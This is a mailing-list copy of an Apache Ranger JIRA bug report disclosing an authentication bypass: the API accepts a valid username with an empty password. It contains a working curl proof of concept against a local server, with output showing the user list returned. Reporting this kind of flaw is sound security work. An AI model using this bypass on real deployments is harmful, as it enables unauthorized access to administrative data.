You are viewing a plain text version of this content. The canonical link for it is here.
Posted to dev@ranger.apache.org by "Jim Halfpenny (JIRA)" <ji...@apache.org> on 2016/02/05 12:51:39 UTC
[jira] [Created] (RANGER-835) Authentication bypass in Ranger API
Jim Halfpenny created RANGER-835:
------------------------------------
Summary: Authentication bypass in Ranger API
Key: RANGER-835
URL: https://issues.apache.org/jira/browse/RANGER-835
Project: Ranger
Issue Type: Bug
Components: Ranger
Affects Versions: 0.5.0
Reporter: Jim Halfpenny
Priority: Critical
Authentication to the Ranger API can be trivially bypassed by sending a valid username along with a null password. API authentication appears to work correctly, rejecting requests if the password is incorrect but allows requests where no password has been sent.
The example below uses curl to demonstrate this issue by retrieving a list of the users.
$ curl -u admin: -v http://127.0.0.1:6080/service/xusers/users
* Trying 127.0.0.1...
* Connected to 127.0.0.1 (127.0.0.1) port 6080 (#0)
* Server auth using Basic with user 'admin'
> HEAD /service/xusers/users HTTP/1.1
> Host: 127.0.0.1:6080
> Authorization: Basic YWRtaW46
> User-Agent: curl/7.43.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: Apache-Coyote/1.1
< Set-Cookie: JSESSIONID=96458E9E9A792D794D8C0D23839CFFC9; Path=/; HttpOnly
< Content-Type: application/xml
< Content-Length: 0
< Date: Fri, 05 Feb 2016 11:41:16 GMT
<
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><vxUserList><resultSize>48</resultSize><vXUsers>...
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)